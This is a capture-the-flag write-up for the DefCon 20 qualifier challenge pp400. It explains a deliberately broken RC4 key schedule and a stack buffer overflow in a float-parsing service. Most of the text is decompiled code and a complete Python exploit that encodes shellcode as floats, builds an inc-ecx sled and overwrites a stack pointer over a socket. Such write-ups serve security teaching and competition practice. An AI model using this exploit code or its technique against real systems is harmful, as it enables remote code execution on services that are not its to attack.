2012-06-04 12:22

DefCon 20 CTF Qualifications: pp400

The binary takes RC4-encrypted, hex-encoded input and then parses the decrypted strings as floats using sscanf("%f", ..). The key schedule for the global RC4 state is invoked as a constructor (ctor); however, they broke the key schedule a bit:

// Hex-Rays decompilation of the target's RC4 key-schedule routine.
// It initialises the global rc4_table S-box and mixes it with symmetric_key.
void __cdecl rc4_key_schedule()
{
  char swap; // ST0F_1@5
  signed int i; // [sp+8h] [bp-8h]@1
  signed int j; // [sp+8h] [bp-8h]@4
  // Fill the S-box in descending order: sbox[0] = 255, ..., sbox[255] = 0.
  for ( i = 255; i >= 0; --i )
    rc4_table.sbox[255 - i] = i;
  // 16-bit store at &x; presumably zeroes x and the adjacent y in one write
  // (confirm against the rc4_table struct layout, which is not shown here).
  *(_WORD *)&rc4_table.x = 0;
  // j only counts the 256 rounds: nothing in the loop body advances
  // rc4_table.x, so every round reads symmetric_key[x & 0xF] and sbox[x]
  // with the same x and swaps sbox[x] with sbox[y].
  for ( j = 0; j <= 255; ++j )
  {
    rc4_table.y += symmetric_key[rc4_table.x & 0xF] + rc4_table.sbox[rc4_table.x];
    swap = rc4_table.sbox[rc4_table.x];
    rc4_table.sbox[rc4_table.x] = rc4_table.sbox[rc4_table.y];
    rc4_table.sbox[rc4_table.y] = swap;
  }
  // Same 16-bit store as above, resetting the indices before keystream generation.
  *(_WORD *)&rc4_table.x = 0;
}

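The generation of cipher bytes is unchanged, so we simply need to adjust our key schedule a bit in the exploit. Note what is broken: the S-box starts out in descending order, and the mixing loop never advances rc4_table.x, so only sbox[0] and symmetric_key[0] ever take part in the swaps. Fixing their broken key schedule is really what took the most time here.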

After reading all those floats into a stack array, it will compute average and standard deviation on them and print some funny messages based on them. The vulnerability is again a text-book stack buffer overflow, as it does not check how many floats are input.

// Hex-Rays decompilation: reads one line of hex text from `infile`, decodes it
// in place into bytes, XORs those bytes with the RC4 keystream (last byte
// first), parses the result with sscanf("%f") and stores it in buffer[index].
// `index` is not range-checked here.
//
// NOTE(review): this listing was flattened during text extraction and lost its
// `*` and `\` characters. The newline literal, the `16 *` multiplication and
// the `*idx` dereferences below are reconstructed; verify against the binary.
long double __cdecl read_encrypted_float(FILE *infile, float *buffer, char index)
{
  float float_result; // [sp+24h] [bp-98h]@1
  char input_buffer[128]; // [sp+28h] [bp-94h]@1
  char *idx; // [sp+A8h] [bp-14h]@1
  int length; // [sp+ACh] [bp-10h]@9
  char stream_byte; // [sp+B3h] [bp-9h]@10

  float_result = 0.0;
  // NOTE(review): `idx &&` here and `if ( idx )` below are kept exactly as
  // extracted; either may originally have been `*idx` -- confirm.
  for ( idx = fgets(input_buffer, 128, infile); idx && *idx != '\n'; ++idx )
  {
    // The parity of the pointer value selects the nibble: an even address
    // writes the high nibble, an odd address ORs in the low nibble. Output
    // byte k overwrites input_buffer[k], which has already been consumed.
    if ( (unsigned __int8)idx & 1 )
      input_buffer[(signed int)(idx - input_buffer) / 2] |= hex_nibble(*idx);
    else
      input_buffer[(signed int)(idx - input_buffer) / 2] = 16 * hex_nibble(*idx);
  }
  if ( idx )
  {
    // Terminate the decoded bytes, then decrypt from the last byte down to
    // the first, so the first keystream byte is applied to the LAST byte.
    length = (signed int)(idx - input_buffer) / 2;
    input_buffer[(signed int)(idx - input_buffer) / 2] = 0;
    --length;
    while ( length >= 0 )
    {
      stream_byte = rc4_get_stream_byte();
      input_buffer[length] ^= stream_byte;
      --length;
    }
    sscanf(input_buffer, "%f", &float_result);
  }
  buffer[index] = float_result;
  return buffer[index];
}

The only challenge this time is that our input must be encoded as valid floats. This is trivially done in Python, but we must take care: not every 32-bit integer can be represented as a float, so some minor variance in the LSB will occur for a full 32-bit integer. For example, doing a round-trip on 0x3f3f3f3f will result in 0x3f3f3f41 (no kidding) in target memory.

The solution again is simple: by leaving the MSB at zero, the number is small enough and will stay intact. And we already have shellcode and generator code built to ignore the MSB, so we can reuse a lot from pp300 and are good to go. Since 0x41414141 = 4x inc ecx, we can use it as a nopsled, and we don't care if the stack address we write onto the stack gets slightly mangled in the LSB. Note that I'm not overwriting the saved return address but parts of the FILE used in fgets, allowing me to place more data on the stack without going through the value calculation first. Here's the modified pp200 exploit:

import binascii
import re
import socket
import struct
import sys

# Collect the machine-code bytes of every instruction in the assembler listing.
instrns = []

with open('fbsd82_defcon.lst') as listing:
    for line in listing:
        # A listing line looks like:
        #     10 00000000 89E7    mov edi, esp
        # Group 1 is the hex dump of the instruction's encoding.
        m = re.match(r'^\s+\d+ [0-9A-F]{8} ([0-9A-F]+)', line)
        if not m:
            continue
        instrns.append(binascii.unhexlify(m.group(1)))

# Repack the shellcode into 4-byte groups whose last byte is always 0x00, so
# each little-endian dword has a zero MSB. The filler B3 00 encodes
# `mov bl, 0`; the 0x66 prefix stretches it to three bytes when only a single
# 1-byte instruction is left to fill the group.
code = b''
idx = 0

while idx < len(instrns):
    size = len(instrns[idx])
    if size == 2:
        code += instrns[idx] + b'\xb3\x00'
    elif size == 1 and idx + 1 < len(instrns) and len(instrns[idx + 1]) == 1:
        # Two consecutive 1-byte instructions share one group. The bounds
        # check keeps a trailing 1-byte instruction from indexing past the end.
        code += instrns[idx] + instrns[idx + 1] + b'\xb3\x00'
        idx += 1
    elif size == 1:
        code += instrns[idx] + b'\x66\xb3\x00'
    else:
        # Instructions longer than two bytes cannot be fitted into a group.
        raise ValueError()
    idx += 1

# Every group above is exactly four bytes, so this padding is only a safeguard.
if len(code) % 4:
    code += b'\x00' * (4 - (len(code) % 4))

# Split the byte string into little-endian 32-bit words.
codewords = []

while code:
    codewords.append(struct.unpack('<I', code[:4])[0])
    code = code[4:]

def rc4setup(key):
    """Build the RC4 state the way the target's modified key schedule does.

    This deliberately differs from textbook RC4 to mirror the service:
    the S-box starts in descending order (255..0), and the index ``x`` is
    never advanced, so every round mixes in ``box[0]`` and ``key[0]`` only.

    Args:
        key: The symmetric key as a byte string (text is encoded as latin-1).

    Returns:
        A ``(box, x, y)`` tuple: the 256-entry S-box as a list of ints, and
        both stream indices reset to 0.

    Raises:
        ZeroDivisionError: If ``key`` is empty.
    """
    if not isinstance(key, (bytes, bytearray)):
        key = key.encode('latin-1')
    key = bytearray(key)  # yields ints on both Python 2 and Python 3

    box = list(range(255, -1, -1))
    x = 0
    y = 0
    for _ in range(256):
        # x intentionally stays 0 for all 256 rounds (see docstring).
        y = (y + box[x] + key[x % len(key)]) % 256
        box[x], box[y] = box[y], box[x]
    return box, 0, 0

def rc4enc(data, box, x, y):
    """XOR ``data`` with the RC4 keystream, continuing from state (box, x, y).

    This is the standard RC4 output step. ``box`` is permuted in place and
    also returned, so consecutive calls continue the same keystream.

    Args:
        data: Bytes to encrypt or decrypt (text is encoded as latin-1).
        box: Mutable 256-entry S-box of ints; modified in place.
        x: Current first stream index.
        y: Current second stream index.

    Returns:
        A ``(output, box, x, y)`` tuple: the transformed byte string and the
        advanced cipher state.
    """
    if not isinstance(data, (bytes, bytearray)):
        data = data.encode('latin-1')

    out = bytearray()
    for byte in bytearray(data):
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        out.append(byte ^ box[(box[x] + box[y]) % 256])

    return bytes(out), box, x, y

# Raw shellcode image; loaded here but not referenced again in this script.
with open('fbsd82_defcon.bin', 'rb') as shellcode_file:
    sc = shellcode_file.read()

# 16-byte RC4 key, matching the symmetric_key[x & 0xF] lookup in the target's
# key schedule. The cipher state is module-global because every value sent
# must continue the same keystream.
box, x, y = rc4setup(
    b'\xb6\x3d\x15\x3a\x04\x15\x69\x72\x45\xfe\xc2\x7f\x12\x78\xd7\x82')

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
s.connect((sys.argv[1], 4016))

# Fixed first line sent to the service before any encrypted data.
# NOTE(review): presumably a password/handshake token; its meaning cannot be
# derived from this file.
s.send(b"b366e2776ce9efff\n")
print(s.recv(4096))

def send_float(s, input):
    """Encrypt one float's decimal text and send it as a line of hex.

    The module-level RC4 state (``box``, ``x``, ``y``) is advanced so that
    successive calls continue the same keystream.

    Args:
        s: Connected socket to the service.
        input: Value to send; it is converted with ``float()`` first.

    Raises:
        ValueError: If the decimal text is longer than 63 characters
            (63 bytes become 126 hex digits, which fits the target's
            128-byte line buffer together with the newline).
    """
    global box, x, y
    text = str(float(input))
    if len(text) > 63:
        raise ValueError()
    # The target decrypts each line from its last byte to its first, so the
    # keystream is applied to the reversed text, which is then flipped back
    # into transmission order.
    encrypted, box, x, y = rc4enc(text.encode('ascii')[::-1], box, x, y)
    s.send(binascii.hexlify(encrypted[::-1]) + b'\n')

def send_dword(s, input):
    """Send a 32-bit unsigned integer by reinterpreting its bits as a float.

    The integer is packed little-endian and the same four bytes are unpacked
    as an IEEE-754 single, which is then handed to ``send_float``.
    """
    raw = struct.pack('<I', input)
    (as_float,) = struct.unpack('<f', raw)
    send_float(s, as_float)

# Stack address written after the 248 payload words.
# NOTE(review): despite the name, the write-up says this overwrites part of
# the FILE structure used by fgets rather than the saved return address.
EIP = 0xbfbfea60

# 0x41414141 decodes as four `inc ecx` instructions and serves as the sled.
# Pad in front so the shellcode words end at word 128, then pad behind to a
# total of 248 words. A negative pad count yields an empty list.
SLED_WORD = 0x41414141
codewords = [SLED_WORD] * (128 - len(codewords)) + codewords
codewords = codewords + [SLED_WORD] * (248 - len(codewords))

print(', '.join([hex(w) for w in codewords]))

for dword in codewords:
    send_dword(s, dword)

send_dword(s, EIP)
# One more value after the overwrite.
# NOTE(review): presumably this next read is what uses the corrupted state;
# confirm against the target.
send_float(s, 0)

print(s.recv(4096))
print(s.recv(4096))